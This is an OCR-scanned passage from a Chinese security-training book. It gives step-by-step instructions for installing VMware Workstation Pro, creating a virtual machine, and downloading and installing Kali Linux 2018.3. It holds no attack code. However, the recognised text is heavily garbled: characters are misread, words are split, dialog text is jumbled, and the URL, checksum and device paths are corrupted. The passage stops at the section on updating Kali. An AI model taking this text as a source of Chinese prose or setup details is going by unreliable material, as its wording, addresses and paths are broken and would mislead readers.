由 VMware Workstation pro 安装 一 X 


VMware Workstation Pro 安装 向 导 已 完成 


14 


WORKSTATIO ON 单 击 "完成 入 扭 退出 支 装 向 导 。 
PR Mm @ 


名 果 要 迪 隐 输入 许可 证 密 诅 ， 请 按 下 面 的 许可 证 ' 按 


4 


单 击 “创建 新 的 虚拟 机 ”按钮 ， 进 入 
“新 建 虚拟 机 向 导 ” 对 话 框 ， 在 其 中 选择 


| 许可 证 () [| 守成 |] 


En “ 自 定 义 ” 单 选 按钮 ， 如 下 图 所 示 。 
在 安装 完成 页 面 中 ， 单 击 “ 许 可 证 ” es 
交 钮 ， 跳 转 至 “输入 许可 证 密 钥 ”页 面 
二 输 po 人 中 be a 欢迎 使 用 新 建 虚 拟 机 向 导 
其 中 可 以 输入 许可 证 窗 钥 ， 如 下 图 所 示 。 
侍 VMware Workstation Pro 安装 1 4 您 着 望 使 用 什么 类 型 的 本 加? 
输入 许可 证 密 钥 py 基 
此 对 活 框 可 保存 产品 许可 证 密 铀 。 轧 bt eh re Workstation 14x 
| | PRO 虚拟 机 。 
许可 证 密 销 格式 : xcc3oecocsxoococoooocxooa 


@ 自 定义 (高 级 )(c) 

一 一 一 一 一 一 一 一 一 创建 带 有 SCSI 控制 器 类 型 ， 虚拟 碰 盘 类 型 
py 以 及 与 旧版 VMware 产品 妆容 性 等 高 加 选 项 

租 作 八 内 站 可 站 禾 贸 ， 寺 这 学潮 ' 训 10 兴 二 字 局 镶 宕 ， 训 后 部 钥 和 A 。 的 虚拟 机 。 


lsep 国 单 击 “下 一 步 ”按钮 ， 进 入 “选择 虚 
拟 机 硬件 兼容 性 ”对 话 框 ， 在 其 中 设置 虚 
> > » 人 不 羔 容 :性 ， 这 里 采用 上 默认 设置 ， 
虚拟 机 安装 完成 后 ， 重 新 启动 系统 ee ol 这 里 未 用 软 认 设置 
后 ， 才 可 以 使 用 虚拟 机 ， 至 此 ， 便 完成 了 


~ a 新 建 虐 拟 机 向 导 x 
NO . 孝 安装， 如 下 图 所 示 。 选择 虚拟 机 硬件 兼容 性 
由 VMware Workstation pro 安装 该 虚拟 机 款 要 何 神 硬件 功能 ? 
虚 Q 机 硬件 兼容 性 
@E 集 公 信 要 洒 局 中 区 并 时 5 世间 硬件 兼容 性 [H): a a 
A Se 2 兼 守 : ESX Server(S) 


64 GB 内 存 
[是 0 ] [| 15 个 处 理 器 
10 个 网 络 通 本 (器 
8 TB 磁盘 大 小 


3.1.3 ”创建 虚拟 机 系统 

安装 完 虚 拟 机 以 后 ， 就 需要 创建 一 
台 真 正 的 虚拟 机 ， 为 后 续 的 测试 系统 做 准 
备 。 创 建 虚 拟 机 的 具体 操作 步骤 如 下 ; 单 去 “下 一 步 ” 按钮 ， 进 入 “安装 客 

双击 果 面 安装 好 的 VMware 虚拟 机 图 ， 户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 “ 稍 后 

标 ， 打 开 VMware 虚 拟 机 软件 ， 如 下 图 所 示 。 安装 操作 系统 ” 单 选 按钮 ， 如 下 图 所 示 。 
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em x 个 存放 虚拟 机 的 磁盘 位 置 ， 如 下 图 所 示 。 
安装 客户 机 操作 系统 
记忆 机 如 月 槐 泽 届 ， 需 要 次 作 夭 统 。 您 村 如 问 训 壮 客户 四 操作 厌 线 ? Ee 
去 装 来 源 : 傅 名 虚拟 机 
你 希望] ) 芭 2 
生态 交 明 [D 您 希望 该 虚拟 机 使 用 什么 宅 称 
无 可 用 驱动 器 虑 以 机 名 称 (V): 
KalHLinux 
人 究 装 程序 光盘 腑 价 闵 件 ([s50)(M): 位 置 (L): 
E:\BaiduNetdekDownload\OS X 10.11.1(15842).iso 浏览 (R)... | dVirtual Machines\Kal- Linux 浏览 (R).… 
在 编辑 > "首选 而 "中 可 更 此 点 让 位 置 。 
@ 稍 后 去 装 拔 作 对 统 (5)。 
他 了 纤 的 虚拟 机 将 包含 一 个 宝 日 硬盘 。 
水 助 < 上 一 步 (B) | 下 一 步 (N) > 职 消 
6 2 > 、 66 、 
单 击 “ 下 一 步 ”按钮 ， 进 入 “选择 客 


< 上 一 步 (B 注 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 Linux  ，  - 
单 选 按钮 ， 如 下 图 所 示 。 [5 国 单 击 “ 下 一 步 ”按钮 ， 进 入 “处 理 器 


ep 配置 ”对 话 框 ， 在 其 中 选择 处 理 器 数量 ， 
和 _ 村, ~ 百 = 二 
au 般 普通 计算 机 都 是 单 处 理 ， 所 以 这 里 不 
座机 所 作 系统 用 设置 ， 处 理 器 内 核 数量 可 以 根据 实际 处 
Er 理 器 内 核 数量 设置 ， 如 下 图 所 示 。 
ONovel NecWarefE) 
站 新 渤 虐 拟 机 向 导 x 
〇 其 他 (0) 处 理 否 队 天 
版 本 (V) 为 比 虚 拟 机 指定 处 理 属 孝 重 。 
Ubuntu v 处 理 器 
处 理 疆 孝 盟 (P): 
每 个 处 理 如 的 内 核 数量 (C): 
处 理 器 内 核 总 数 : 
某 助 < 上 一 步 (B) | 下 一 步 (N) > 职 消 


单 击 “ 版 本 ”下 拉 按 钮 ， 在 弹出 的 下 
拉 列 表 中 选择 “其 他 Linux 4.x 或 更 高 版 本 
内 核 64” 版 本 系统 ， 这 里 的 系统 版 本 与 主 


机 系统 版 本 无 关 ， 可 以 自由 选择 ， 如 下 图 i < Ee) 
所 示 。 


取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “此 虚拟 
Red Hat Enterprise Linux 4 64 位 
Red Hat Enterprise Linux 4 


Hat Enterprise Linux 3 64 位 机 的 内 行 人 对 话 框 9 根据 实 际 主机 进行 设 
Red Hat Enterprise LInUX 3 、 
人 置 ， 最 少 内 存 不 能 低 于 768MB， 这 里 选择 
Sun ]ava Desktop System _ 
cn epres 1 人 和 4096MB 也 就 是 4G 内 存 ， 如 下 图 所 示 。 

LNUX Enmterprtse 


SUSE Lnux Enterprise 10 64 垃 


SUSE Lnux Enterprise 10 _ 新 嫩 虑 拟 机 向 导 x 
SUSE Lnux Enterprise ye 54 位 
SUSE Lnux Enterprise 了 此 虚拟 机 的 内 存 
SUSE Lnux 64 位 四 
Scene 您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 
Turbolinux 64 位 
ra 指定 分 包 妆 此 庶 沁 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 的 倍数。 
Ubuntu 
545 此 虚拟 机 的 内 存 (N): | 409d 寺 MB 
16 GB 
4c8 “ 例 “” 人 推荐: 
全 2GB 6 
其 他 LinUx 2.4.x 内 校 54 位 1GB 
其 他 Linux 2.4.x 内 核 和 S12 MB 司 ” 同 推荐 内 存 : 
其 他 Linux 2.2.x 内 核 Y 256 MB 768 MB 
其 他 Unux 4.x 或 惠 高 版 本 和 内核 64 位 ~ 128 MB 
二 64MB 刁 客户 机 操作 系统 最 低 扒 荐 内 让: 
32 MB 本 32 MB 
6 3 和 . ™ 【14 16 MB 
单 击 “ 下 一 步 ” 按 钮 ， 进 入 “命名 虚 sm 


拟 机 ”对 话 框 ， 在 “虚拟 机 名 称 ” 文 本 框 四 
中 输入 虚拟 机 名 称 ， 在 “位 置 ” 中 选择 一 
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单 击 “ 下 一 步 ” 按 钮 ， 进 入 “网 络 类 
型 ”对 话 框 ， 这 里 选择 “使 用 网 络 地 址 转 


换 NAT?” 单 选 按钮 ， 如 下 图 所 示 。 


新 建 虚 拟 讯 向导 
网 络 类 型 
要 添加 哪 类 况 络 ? 
了 网络 连接 
中 使 用 桥接 网 络 (R) 
ne 客户 机 在 外 部 网 络 上 必须 


@ 使 用 网 阁 地 址 转换 (NAT)(E) 
为 这 户 机 术 作 系统 提 共 使用 主机 全 地 址 访问 主机 找 号 连接 或 处 部 以 术 网 网 络 连 接 的 


C 〇 使 用 仅 主机 模式 网 络 (H) 
将 客户 机 操作 闲 统计 拉 到 主机 上 的 专 月 虚拟 风 络 。 


吕 址 使 用 网 络 连 按 (T) 


帮助 < 上 一 步 (B) 取消 


单 击 “下 一 步 ” 按 钮 ， 进 入 “选择 I/ 
这 里 选择 LSI Logic 


OO 控制 器 类 型 ”对 话 框 ， 
单 选 按 钮 ， 如 下 图 所 示 。 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
这 里 选择 SCSI 单 选 按 


磁盘 类 型 ”对 话 框 ， 
钮 ， 如 下 图 所 示 。 


选择 磁盘 类 型 
您 要 创建 何 种 磁盘 ? 


虚拟 磁盘 类 型 

QO IDE(D 

@®@) SCSI(S) (推荐 ) 
OSATA(A) 
ONVMe(V) 


帮助 < 上 一 步 (B) 取消 
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新 建 虐 拟 机 向 导 x 
选择 I/O 控制 器 类 型 
您 要 使 用 何 种 类型 的 5C5I 控制 器 ? 
IJ/0 控制 器 类 型 
5C5I 控制 器 : 
BusLogic(U) (不 适用 于 84 位 客户 机 ) 
@®@) L511 Logic(L) (推荐 ) 
O LSI Logic SAS(S) 
帮助 < 上 一 步 (B) 取消 


新 建 虚拟 记 向 导 xX 


一 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
磁盘 ”对 话 框 ， 这 里 选择 “创建 新 虚拟 磁 
盘 ” 单 选 按钮 ， 如 下 图 所 示 。 


选择 磁盘 
浆 要 使 用 那个 硬盘 ? 


太 盘 
加 人 I 纤 新 虚拟 王 盘 (V) 
虚拟 研 盘 由 主机 文件 系统 上 的 一 个 或 务 个 文件 组 成 ， 客户 机 操作 系统 会 将 其 为 
单个 大 盘 。 虚 拟 研 盘 可 在 一 台 主机 上 或 多 台 主 机 之 间 轻松 奢 制 或 移动 。 
O 〇 使 用 现 有 点 所 磁盘 (E) 
选 泽 此 选项 可 重新 使 用 以 前 醒 震 的 说 盘 。 
口 使 用 牧 对 和 盘 (适用 于 高 级 用 户 )(P) 
选 滩 此 读 项 5 为 庶 所 机 覃 从 直接 访问 本 地 福 各 的 权限 。 霜 要 且 有 管 军 品 特权。 


帮助 < 上 一 步 (B) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “指定 磁 
盘 容 量 ” 对 话 框 ， 这 里 磁盘 大 小 设置 40GB 
空间 即 可 ， 选 择 “ 将 虚拟 盘 拆 分 成 多 个 文 
件 ” 单 选 按钮 ， 如 下 图 所 示 。 


新 建 虚拟 机 向 导 


指定 磁盘 容 里 
磁盘 大 小 为 多 少 ? 


最 大 成 盘 大 小 (56)(5):| 4d 


针对 其 他 Lnux 4.x 或 更 高 版 本 内 核 64 位 的 建议 大 小 : 8 GB 


癌 ] 立即 分 配 所 有 三 盘 空 有 (A)。 
分 配 所 有 容量 可 以 提高 性 能 ， 但 要 求 上 折 有 物理 详 盘 空间 立即 可 用 。 如 果 不 立 即 分 配 所 有 
空 惠 ， 虐 拟 磁 盘 的 空间 最 初 很 小 ,会 随 着 售 向 其 中 添加 娄 据 而 不 断 变 大 。 

O 〇 将 虚拟 磁盘 存 闹 为 单个 文件 (0) 

® 将 虚拟 磁盘 拆 分 成 条 个 文件 (由 
拆 分 磁盘 后 ， 可 以 更 轻 格 地 在 计算 机 之 间 称 动 虚 拟 机 ， 但 可 能 会 降 居 大 容量 碰 盘 的 性 
Aes 


帮助 < 上 一 步 (B) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “指定 磁 


盘 文件 ”对 话 框 ， 
下 图 所 示 。 


新 建 虚拟 机 向 导 


指定 磁盘 文件 
您 要 在 何 处 存 伴 盘 文件 ? 


这 里 保持 默认 即 可 ， 如 


碰 盘 文件 (H) 
人 40 68 虚拟 磁盘 。 将 根据 此 区 件 名 自动 登 名 这 些 说 盘 广 


浏览 (R)..… 


帮助 < 上 一 步 (B) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 创建 虚拟 机 ”对 话 框 ， 如 下 图 所 示 。 


新 建安 拟 机 启 导 XxX 


已 准备 好 创建 虚拟 机 
ee 。 然后 可 以 安装 其 他 Linux 4.X 或 利 高 版 本 内核 扩 
we 

档 使 用 下 列 黄 着 创 建 虚 拟 机 : 

名 称 : Kali-Linux 

位 善 : d:\Vrtual Machines\KaliLinux 

版 本 : Workstation 14.x 

操作 予 统 其 他 Linux 4.x 或 事 言 版 本 内 校 时 位 

硬盘 : 40 GB, 拆 分 

和 内 三: 4096 MB 

网 络 适 配 吗 : NAT 

其 仙 设 备 ; 4 个 CPU 内 校 , CD/DVD, U5B 控制 咒 , 打 ED 机 , 表 卡 


户 定 愉 硕 件 (C)… 


< 上 一 步 () 取消 


单 击 “ 完 成 ”按钮 ， 至 此 ， 便 创建 了 
一 个 新 的 虚拟 机 ， 如 下 图 所 示 。 这 一 步 相 
当 于 组 装 了 一 台 裸 机 计算 机 ， 这 当中 的 硬 
件 设 配 ， 可 以 根据 实际 需求 再 进行 更 改 。 


Bl Kali-Unux - VMware Workstation 一 口 xX 


文 八 F) 娘 镶 ({E] 音 吾 (Vj 虚拟 机 [IM]】 运 厌 卡 [T) 帮助 四 | 辽 ~ | oN 
上 0 主页 | 门 Kali-Limux 
1 站 
四 | Kali-Linux 
入 开启 此 点 扳机 
曙 志 各 去 所 机 设 各 
” 设备 
闪存 4 G8 
回 处 至 跨 4 
恩 弄 至 [SCSI) 40 .68 
CD/DVD (IDE) 自动 性 测 
哆 网 光洁 配 区 NAT 
图 U56 扩 则 器 将 下 
哇 二 卡 月 动 恰 测 
利和 打印 机 和 存在 
融 中 直 艇 自动 性 刘 
摘 这 
在 此 处 妊 入 7 


” 诬 拟 机 详细 信息 


状 矶 : 已 关机 
配置 文 忻 : DAVirtual Machines Kali-UnwnoKali-Linumx. vmx 
醒 件 焚 容 性 : Workstation 14.x 着 议 机 
主 IP 她 直 ; 网 站 便 息 不 可 局 


安装 与 虽 新 Kali Linux 操 
作 系 统 
现实 中 组 装 好 计算 机 以 后 需要 给 它 安装 
一 个 系统 ， 这 样 计 算 机 才 可 以 正常 工作 ， 虚 


拟 机 也 一 样 ， 同 样 需要 安装 一 个 操作 系统 ， 
本 节 介 绍 如 何 安装 Kali Linux 操 作 系 统 。 


3.2.1 下 载 Kali Linux 系 统 


Kali Linux 是 基于 Debian 的 Linux 发 行 
版 ， 设 计 用 于 数字 取证 操作 系统 。 由 Offen- 
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sive Security Ltd 维 护 和 资助 。 最 先 由 Offen- 
sive Security 的 Mati Aharoni 和 Devon Kearns 
通过 重 写 BackTrack 来 完成 ，BackTrack 是 他 
们 之 前 写 的 用 于 取证 的 Linux 发 行 版 。 
下 载 Kali Linux 系 统 的 具体 操作 步骤 
如 下 : 
在 浏览 器 中 输入 Kali Linux 系 统 的 网 
址 : https: Wwww.kaliorg， 按 Enter 键 打开 
Kali 官 方 网 站 ， 如 下 图 所 示 。 


[KALI| 0 


Our Most Advanced Penetration Testing Distribution, Ever. 


Latest Kali Linux News and Tutorials 


_ 村 [ 
| @ WIREGUARD 


: MODERN, SECURE VPN 


单 击 Downloads 菜 单 ， 在 弹出 的 菜单 
列表 中 选择 Download Kail Linux 选 项 ， 如 下 
图 所 示 。 


ANCED PACKAGE 
ANAGEMENT 


Downloads Training 
Download Kali Linux 


Kali Linux NetHunter 


Kali Linux Revealed Book 


Release Information 


Kaili 提 供 了 各 种 版 本 的 系统 下 载 ， 用 
户 可 以 通过 HTTP 或 者 Torrent 两 种 方式 进行 

下 载 ， 如 下 图 所 示 。 用 户 可 根据 实际 情况 

选择 下 载 相应 的 版 本 ， 这 里 选择 最 上 面 一 项 
“Kali Linux 64 Bit” 进 行 下 载 。 


Image Name Download Siz Versi sha256sum 
Kali Linux 64 Bit TTP | Torrent 30G 2018.]a 5lbcl17eeg3ffBl12c674af35563131bb336e943ccefBc568B5867f3bfBl137Te4b2 
Kali Linux 32B TTF ent .1G 2018.3 
Kali Ll Li 时 TTF 2018.3 1 Se 
54 
Kali Linux Light TTP 1 2018.3 
328 
Kali Linux Kd TIP 3 2018.3 
64B 
Kali L LXDE TTF 2018.3 
648 
Kali L FCE TTF 2018 = 
54 
Kali | MATE TIP 3 2018.3 
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二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


Kali 官 方 还 提供 了 快速 装机 方式 
wmware 镜 像 下 载 ， 这 个 列表 不 但 提供 了 
wmware 虚 拟 机 镜像 ， 还 提供 了 vobx 虚 拟 镜 
像 ， 如 下 图 所 示 。 


Kali Linux 64 bit VMware VM Available on the Offensive Security Download Pag 
Kali Linux 32 bit VMware VA PAE Available on the Offensive Security Download Pae 
Kali Linux 64 Bit Vbox Available on the Offensive Security Download Paee 
Kali Linun 32 Bit Vbox Available on the Offensive Security Download Page 


网 提示 : 初学 者 建议 先 手动 安装 Kali Linux 
系统 ， 以 后 使 用 熟练 后 可 以 选择 虚拟 机 镜 
像 安装 。 


如 3.2.2 ”安装 Kali Linux 系 统 


oe 架设 好 虚拟 机 并 下 载 好 Kali Linux 系 统 

后 ， 接 下 来 便 可 以 安装 Kali Linux 系 统 了 。 
安装 Kali 操 作 系 统 的 具体 操作 步骤 如 下 : 
打开 安装 好 的 虚拟 机 ， 单 击 CD/DVD 
选项 ， 如 下 图 所 示 。 


@ Kali-Unu - VMware Workstation 一 口 xX 
文件 上 ”所 各 [E) ”去 室 (V) 。 志 拟 机 (M) 远 现 上 三 且 |H) 其 > ON 
人 ?主页 Kali-Linux 
mr | Kali-Linux 

BD 开 己 此 上 其 

也 晤 福 直 菩 机 设 巡 
设备 

三 内存 468 

口 处 理 跨 

台大 三 [SCSI] 40 GB 

璐 EBD 

竹 网 治 否 配器 NAT 

可 USB 控制 昭 存在 

必 疡 卡 振动 这 列 

w+ 存在 

属 呈 二 骨 后 动 恰 列 
= 摘 运 

i 哇 入 对 该 才 氢 ; 


” 虑 拟 机 详细 信息 
状态 : 已 关机 
配 轴 文件 : Di\WVirtual Machines\Kali-Linux\Kali-Linux,vmx 
本 人 忻 妾 容 性 : Workstzsticn 14.x 庶 神 机 
主 IP 动 址 : 网 次 售 蔚 不 可 用 


口 


在 打开 的 “连接 ”界面 中 选择 “使 用 
ISO 映像 文件 ” 单 选 按钮 ， 如 下 图 所 示 。 
连接 
O 〇 ] 使 用 物理 驱动 器 (pP): 
自动 检测 
@) 使 用 I50 映像 文件 (M): 
D:\BaiduNetdiskDownload\k | 


高 级 (V).…. 
单 击 “ 浏 览 ” 按钮 ， 打 开 “ 浏 览 ISO 
影像 ”对 话 框 ， 在 其 中 选择 下 载 好 的 系统 
映像 文件 ， 如 右上 图 所 示 。 
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回 浏览 ISO 了 里 你 x 
小 « BaduN.. » kali-linux-2018-3a-amd64-iso vt 沪 室 "kali-linux-2018-3a-am... 万 
组 纪 ~ 新 尝 广 件 广 
A 爷们 
国 此 电 羽 CI 
六 3D 对 条 kali-linux-2018.3a-amd64.iso 2018/9/24 18:21 GuangsuZip 和 le 3 .11 
国 视频 


二 Windows10 (C: 
| 一 zt 有 (Dj 
二 本 地 戏 盘 (E;) 


! 咏 网 千 J 7 


文具 宇 (N)- | kali-linux-2018.3a-amd64jso , CD-ROM 了 里 你 (*.iso) 


| a 
单 击 “ 打 开 ” 按 钮 ， 返 回 到 虚拟 机 
设置 界面 ， 这 里 单 击 “开启 此 虚拟 机 ” 选 
项 ， 便 可 以 启动 虚拟 机 ， 如 下 图 所 示 。 


拓 开 言 此 去 氢 机 
切 寺 张 虚拟 机 设 什 
= 条 每 

责 内 丰 4GB 

四 处 涅 器 4 

装 看 天 (SCSI) 40 GB 
D0 0 下 区 丰 区 
ES NAT 
图 usB8 控 #l 骂 存在 

唱 ) 志 卡 目 动 检测 
吕 箱 印 矶 和 存在 

丽 至 示 器 自动 检测 


启动 虚拟 机 后 会 进入 到 启动 选项 界 
面 ， 用 户 可 以 通过 键盘 上 下 键 选择 Graphical 
install 选 项 ， 如 下 图 所 示 。 


Boot menu 


Liuvue Land6d) 

Live (andbd failsafe) 

Live (forensic modle) 

Live USB Persistence 

Liup USB Encrynted Persistence 
Install 

Graphical install 

Install uith speech smthesis 
flduanced options 


(check kali.org/prst) 
(Eheck kali,org/prst) 


选择 完毕 后 ， 按 Enter 键 ， 进 入 语言 
择 界 面 ， 这 里 选择 “简体 中 文 ” 选项 ， dn 
下 图 所 示 。 


Select a language 


Choose the language to be used for the installation process, The selected language will also be the 
default language for the installed system. 


Language; 

Basque Euskara 

Belarusian - BenapycKan | 

Bosnian - Bosanski 

Bulgarian - “5wnrapckn 

Burmese -Hino 

Catalan < Catala 

Chinese (Simplified) ”- 中 文 (简体 ) 

chinese (Traditional) ”- ”中文 ( 烽 盯 ) 

Croatian Hrvatsk 

Czech Cestin 

Danish Dansk 

Dutch - Nederlands 

Dzongkha | 

Cnglish - English 

Fsnerantn | Esnerantn 癌 
screenshot GoBack | Continue | 


单 击 Continue 按 钮 ， 进 入 选择 语言 
确认 界面 ， 保 持 系 统 默认 设置 ， 如 下 图 
所 示 。 


select a language 


后 这 放言 的 安装 程序 湖 详 阐 末 全 部 充 成 ， 

如果 勾 捧 续 以 所 这 语 育 安 蕉 ， 对 话 框 皮 该 会 正确 显示 ,但 是 - 特别 是 如 果 起 便 用 安 准 程 奈 中 更 高 淮 的 选项 - 有 很 小 的 可 能 性 毅 分 内 器 会 以 紧 舍 
中 文 显 示 ,或 者 , 如 果 那 也 不 可 用 ， 则 会 以 英文 显示 ， 

要 以 所 让 的 下 过 粒 颖 安 稚 晤 > 

OO 如 

® 沂 


| “ 尿 共 下 图 | | gm || i | 


单 击 “ 继 续 ” 按 钮 ， 进 入 “请 选择 您 
的 区 域 ” 界 面 ， 它 会 自动 上 网 匹配 。 即 使 不 
正确 也 没有 关系 ， 系 统 安装 完成 后 还 可 以 调 
整 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 


迹 择 的 区 域 赂 被 用 于 设置 您 的 时 区 以 及 其 好 例如 帮助 决 主 系 虐 区 域 。 通 常 这 店 读 为 您 所 居 人 性 的 国家 . 


这 是 根据 您 所 进 择 的 语言 产生 的 短 列 乏 ， 如 时 没有 列 出 您 的 区 域 ， 诱 夺 择 "其 负 . 
司 家 、 叔 地 或 地 区 : 


首 尖 
新 加 埃 
稍 洪 
其 他 
| 屏幕 稚 团 | 返回 刀 技 | 


单 击 “ 继 续 ” 按 钮 ， 进 入 “请 选择 键 
盘 映 人像” 界面 ， 同 样 系统 会 根据 语言 选择 
来 自行 匹配 ， 这 里 保持 默认 设置 ， 如 下 图 
所 示 。 


迁 渤 床 肆 十 觅 射 - 

英 式 英语 

保加利亚 阁 (BDS 布局 ) 
勾 加 利平 话 ( 拼 吾 布局 ) 


| “ 忆 关 本 图 | 四 || sa | 


单 击 “继续 ”按钮 ， 进 入 “配置 网 
如 输入 Kali， 如 右上 图 所 示 。 
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配置 网 络 

博物 人 入 系统 的 主机 名 . 

主机 名 是 在 网 络 中 标示 你 的 系 绕 的 一 个 单词 ， 如 时 可 不 知道 主机 名 其 慎 么 ， 请 询问 网 络 管 理 员 ， 如 果 炮 正在 设置 内 部 网 络 ， 那么 可 以 随 室 写 个 
名 字 . 


主 胡 名 : 


站 Ra 四] mm | mm | 


单 击 “继续 ”按钮 ， 进 入 “配置 网 
终 ” 界 面 ， 这 里 可 以 输入 一 个 域名 ， 也 可 


以 随意 写 一 个 ， 但 站 要 克 保 您 所 有 计算 机 的 域名 和 鼠 一 样 的 。 
直言 : 


LL______ 


Ces] 


按 Enter 键 ， 进 入 “Root 用 户 窗 码 ” 界 
面 ， 这 里 可 以 设置 两 个 相同 的 客 码 ， 如 下 
图 所 示 。 


Root 用 户 密 三 : 


CC 


DJ 显示 明文 密码 


为 了 保证 您 的 密码 正确 无 误 ， 请 再 次 输入 相同 的 root 密码 。 
请 再 次 输入 刻 码 以 验证 其 正确 性 : 


ss 


DJ 显示 明文 密码 


按 Enter 键 ， 进 入 磁盘 划分 界面 ， 新 于 
建议 不 划分 也 就 是 选择 “使 用 整个 磁盘 ” 
选项 ， 如 下 图 所 示 。 


向 导 - 使 用 整个 磁盘 


向 导 - 使 用 整个 磁盘 并 配置 LVM 
向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LVM 
手动 


按 Enter 键 ， 进 入 选择 分 区 磁盘 界面 ， 
这 里 可 以 保持 默认 设置 ， 如 下 图 所 示 。 


注意 ， 所 选 磁盘 上 的 全 部 数据 痢 将 被 删除 ， 但 是 您 还 是 有 确认 是 否 真 的 要 这 么 做 的 机 会 。 
清 选 三 要 分 区 的 磁盘 : 


SCSIl (0,0,0) (sda) - 42.9 GB VMware, VMware Virtual S 


step 图 按 Enter 键 ， 进 入 文件 分 区 界面 ， 这 里 
保持 默认 设置 ， 如 下 图 所 示 。 
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搭建 无 线 测 试 系统 Kali Linux 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


| 选 定 要 分 区 : 
SCSIl (0,0,0) (sda) -VMware, VMware Virtual S: 42.9 GB 


该 磁盘 可 以 使 用 以 下 数 种 不 同方 式 来 进行 分 区 。 如 果 您 不 确定 ， 请 选择 第 一 个 。 
分 区 方案 : 


和 将 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 ) 


特 /home 放 在 单独 的 分 区 
特 /home、Nvar 和 上 mp 都 分 别 放 在 单独 的 分 区 


step 图 按 Enter 键 ， 进 入 分 区 确认 界面 ， 如 下 
图 所 示 。 


这 是 您 月 闻 已 配置 稚 分 区 和 持 谎 十 的 幸 辣 信息， 证 迁 玫 一 个 分 区 从 辽 改 其 识 置 [文件 朋 弦 、 苦 夸 贞 部 ， 或 进 帮 一 儒 空 交 空 闸 以 创建 新 分 区 ， 台 
或 迁 拖 一 个 设 毕 以 和 的 比 天 分 区 起 。 

分 区 向 导 

软件 RAID 设置 

[| 

配置 加 空 着 

配置 iSCSI 状 


d 


SCSIL (0,0,0) (sda) - 42.9 GB VMware, VMware Virtual $ 
> #1 主 38.7 GB f ext4 了 


> #5 。 于 加 4.3GB f swap swap 


莉 消 对 分 区 设置 的 收 改 
持 不 分 区 设 定 井 物 收 改写 入 碰 仍 


按 Enter 键 ， 进 入 格式 化 分 区 界面 ， 选 
择 “ 是 ” 单 选 按钮 ， 如 下 图 所 示 。 


| 如 果 您 继续 ; 以 下 所 列 出 的 修改 内 容 将 会 写 入 到 磁盘 中 。 或 者 ， 您 也 可 以 手动 来 进行 其 它 修改 。 


以 下 设备 的 分 区 表 已 改变 : 
SCSIl (0,0, 0) (sda) 


以 下 分 区 将 被 格式 化 : 
SCSIl (0,0,0) (sda) 设备 上 的 第 1 分 区 将 设 为 ext4 
SCSI1 (0,0,0) (sda) 设备 上 的 第 5 分 区 将 设 为 swap 


将 改动 写 信 磁 三 胎 ? 
@ 
© 


按 Enter 键 ， 进 入 配置 软件 包 管 理 器 界 
面 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 


网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 。 


使 用 了 网 绪 镜 父 吗 ? 


gry 


按 Enter 键 ， 进 入 是 否 使 用 代理 上 网 界 
面 ， 设 置 保持 默认 设置 ， 如 下 图 所 示 。 


| 如 果 您 需要 用 HTTP 代理 来 连接 外 部 网 络 ， 请 在 此 输入 代理 信息 。 和 否则 ， 请 置 空 


代理 信息 应 按照 “http://[[ 用 户 名 ][: 密 码 ]@] 主 机 名 [: 端 口 ]/” 的 标准 格式 给 出 。 
HTTP 代理 信息 (如 黑 没 有 请 留 裤 ) : 


LL 


按 Enhter 键 ， 进 入 将 GRUB 安 装 至 硬盘 
界面 ， 保 持 默认 设置 ， 如 右上 图 所 示 。 
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| ca 上 只 一 的 拘 作 系统 。 如 果 的 确 如 此 ， 您 应 该 可 以 安全 地 将 GRUB 启动 引导 器 安装 到 复 一 硬 重 的 主 引导 记录 
(MBR) 


里 告 : 如 果 安装 程 太 无 法 在 您 的 计算 机 上 柠 测 到 已 邦 在 的 其 始 操 作 系 统 ， 收 改 主 引 导 记 得 动作 暂时 移 使 该 染 作 系 弹 无 法 启动 。 但 是 ， 您 可 以 笑 
后 再 手动 设置 GRUB 以 启动 它 

粹 GRUB 局 动 引 导 器 安 关 到 去 引 忆 记录 (M9R) 上 局 ? 
C) 否 


按 Enter 键 ， 进 入 选择 引 寻 路 径 界 面 ， 
选择 “/devwsda” 和 选项， 如 下 图 所 示 。 


| 您 需要 通过 特 GRUB 启动 引 导 共 安 法 到 可 局 动 设备 上 以 使 新 安装 的 系统 能 够 启动 。 通 壳 的 作法 足 禾 GRUB 去 闪 列 隐 第 一 块 硬盘 的 主 引导 记录 
(MBR) 上 。 如 时 您 恶 营 ， 也 可 以 将 GRUB 安装 到 哎 动 鼎 的 其 伦 地 方 ， 或 者 其 他 的 噶 动 右上 ， 甚 至 还 可 以 实 装 到 一 张 软 盘 上 
家 蕉 局 副 引 导 辣 的 设备 : 


手动 简 人 设备 
vs | 


[step 图 按 Enter 键 ， 进 入 完成 安装 ， 提 示 用 户 
本 进入 系统 ， 如 下 图 所 示 。 


| 结束 安装 进程 


雪 准 完成 
安装 过 程 已 经 完成 ， 该 足 重启 进 人 您 购 新 系 蚁 的 时 候 了 。 请 确认 已 经 取 出 了 实 装 介质 ,以 使 你 能够 启动 到 新 系统 而 非 重新 开始 安 装 。 


[step 图 按 Enter 键 ， 安 装 完 成 后 重启 ， 进 入 用 
下 图 所 示 。 


星期 一 19:36 


单 击 “下 一 步 ” 按 钮 ， 进 入 登录 密码 
界面 ， 在 其 中 输入 设置 好 的 管理 员 密 码 ， 
如 下 图 所 示 。 


单 击 “登录 ”按钮 ， 至 此 便 完 成 了 
ye Linux 系 统 的 安装 工作 ， 如 下 图 
所 示 。 


3.2.3 ”更 新 Kali Linux 系 统 


